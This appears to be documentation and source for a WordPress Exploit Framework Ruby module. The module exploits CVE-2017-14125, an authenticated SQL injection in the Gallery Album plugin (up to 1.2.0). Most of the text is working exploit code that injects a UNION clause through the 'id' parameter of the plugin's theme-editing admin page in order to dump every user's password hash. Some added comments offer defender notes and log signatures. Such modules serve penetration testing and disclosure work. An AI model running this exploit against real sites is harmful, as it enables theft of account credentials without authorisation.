class Wpxf::Auxiliary::GalleryAlbumHashDump

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::HashDump::new
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 6
# Builds the module and registers its descriptive metadata.
#
# Calls the superclass initializer first, then hands the name, description,
# authors, references and disclosure date to +update_info+.
#
# Defender note: the affected range in the title (<= 1.2.0) and the
# CVE/WPVDB references below are the identifiers to match against plugin
# inventories and scanner output.
def initialize
  super

  description = %(
      Responsive Image Gallery, Gallery Album <= 1.2.0 contains an SQL injection vulnerability
      which can be leveraged by all registered users with the permission
      to manage the plugin settings. This module utilises this vulnerability
      to dump the hashed passwords of all users in the database.
    )

  credits = [
    'Manuel Garcia Cardenas', # Disclosure
    'rastating'               # WPXF module
  ]

  # Public advisories describing the issue.
  advisories = [
    ['WPVDB', '8907'],
    ['CVE', '2017-14125'],
    ['URL', 'http://seclists.org/fulldisclosure/2017/Sep/55']
  ]

  update_info(
    name: 'Responsive Image Gallery, Gallery Album <= 1.2.0 Authenticated Hash Dump',
    desc: description,
    author: credits,
    references: advisories,
    date: 'Sep 22 2017'
  )
end

Public Instance Methods

check()
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 30
# Version check for the target plugin.
#
# Delegates to +check_plugin_version_from_readme+ with the plugin slug and
# the version string '1.2.1'.
# NOTE(review): '1.2.1' is presumably the first fixed release (the module
# title says <= 1.2.0 is affected) -- confirm against the helper's contract.
#
# @return whatever +check_plugin_version_from_readme+ returns
def check
  plugin_slug = 'gallery-album'
  version_bound = '1.2.1'
  check_plugin_version_from_readme(plugin_slug, version_bound)
end
hashdump_number_of_cols()
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 54
# Column count reported to the hash dump base class.
# NOTE(review): presumably the number of columns the generated UNION
# statement must supply to match the plugin's query -- the consumer is not
# shown here.
#
# @return [Integer] always 4
def hashdump_number_of_cols
  4
end
hashdump_request_params()
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 42
# Request parameters sent to the plugin's theme editing page.
#
# The 'id' value is a negated three-digit random number followed by a UNION
# clause built from +hashdump_sql_statement+ and a trailing SQL comment.
#
# Defender note: a non-integer 'id' on requests carrying
# page=wpdevart_gallery_themes and task=add_edit_theme is the observable
# signature in web and WAF logs; the value is expected to be a plain integer.
#
# @return [Hash{String => String}] the 'page', 'task' and 'id' parameters
def hashdump_request_params
  random_id = Utility::Text.rand_numeric(3)
  id_value = "-#{random_id} UNION #{hashdump_sql_statement}--"

  params = {}
  params['page'] = 'wpdevart_gallery_themes'
  params['task'] = 'add_edit_theme'
  params['id'] = id_value
  params
end
hashdump_visible_field_index()
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 50
# Index of the visible field reported to the hash dump base class.
# NOTE(review): presumably the column whose value is reflected in the
# response -- whether it is zero- or one-based depends on the consumer,
# which is not shown here.
#
# @return [Integer] always 1
def hashdump_visible_field_index
  1
end
requires_authentication()
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 34
# Declares that the module needs an authenticated session.
#
# This matches the module description: the flaw is only reachable by
# registered users permitted to manage the plugin settings, so restricting
# that permission narrows exposure.
#
# @return [Boolean] always true
def requires_authentication
  true
end
reveals_one_row_per_request()
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 38
# Flag reported to the hash dump base class.
# NOTE(review): by its name, each response exposes a single row, so the
# base class presumably issues one request per user record -- confirm
# against Wpxf::WordPress::HashDump, which is not shown here.
#
# @return [Boolean] always true
def reveals_one_row_per_request
  true
end
vulnerable_url()
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 58
# URL of the admin endpoint the module sends its request to.
#
# Joins the WordPress admin base URL with 'admin.php' via +normalize_uri+.
#
# @return whatever +normalize_uri+ returns for the two parts
def vulnerable_url
  admin_base = wordpress_url_admin
  normalize_uri(admin_base, 'admin.php')
end